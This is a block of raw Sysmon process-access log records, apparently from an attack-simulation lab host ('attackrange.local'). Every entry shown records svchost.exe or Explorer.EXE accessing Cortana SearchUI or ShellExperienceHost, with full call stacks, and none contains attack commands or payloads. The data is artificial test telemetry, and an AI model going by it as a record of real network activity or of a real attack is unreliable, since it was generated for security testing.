12:09:18.223{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010748Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.223{266CAFBE-646C-6064-0D00-00000000AE01}612628C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+1644|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010747Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:18.223{266CAFBE-646C-6064-0D00-00000000AE01}612628C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+1644|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010746Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:18.223{266CAFBE-646C-6064-0D00-00000000AE01}612628C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+1644|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010745Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:18.223{266CAFBE-646C-6064-0D00-00000000AE01}612628C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+1644|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010744Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:18.223{266CAFBE-646C-6064-0D00-00000000AE01}612628C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+1644|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010743Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:18.223{266CAFBE-646C-6064-0D00-00000000AE01}612628C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+1644|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010742Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:18.223{266CAFBE-646C-6064-0D00-00000000AE01}612628C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+1644|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010741Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:18.223{266CAFBE-646C-6064-0D00-00000000AE01}612628C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+1644|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010740Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:18.223{266CAFBE-646C-6064-0D00-00000000AE01}612628C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+1644|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010739Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:18.223{266CAFBE-646C-6064-0D00-00000000AE01}612628C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+1644|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010738Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:18.223{266CAFBE-646C-6064-0D00-00000000AE01}612628C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+1644|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010737Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:18.223{266CAFBE-646C-6064-0D00-00000000AE01}612628C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+1644|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010736Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:18.223{266CAFBE-646C-6064-0D00-00000000AE01}612628C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+1644|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010735Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:18.223{266CAFBE-646C-6064-0D00-00000000AE01}612628C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+1644|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010734Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:18.223{266CAFBE-646C-6064-0D00-00000000AE01}612628C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+1644|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010733Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:18.223{266CAFBE-646C-6064-0D00-00000000AE01}612628C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+1644|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010732Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.223{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a344|C:\Windows\SYSTEM32\psmserviceexthost.dll+11025|C:\Windows\SYSTEM32\psmserviceexthost.dll+1089f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010731Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:18.223{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ad|C:\Windows\SYSTEM32\psmserviceexthost.dll+11025|C:\Windows\SYSTEM32\psmserviceexthost.dll+1089f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010730Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.223{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ad|C:\Windows\SYSTEM32\psmserviceexthost.dll+11025|C:\Windows\SYSTEM32\psmserviceexthost.dll+1089f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010729Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:18.223{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f9e|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000010728Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:18.223{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows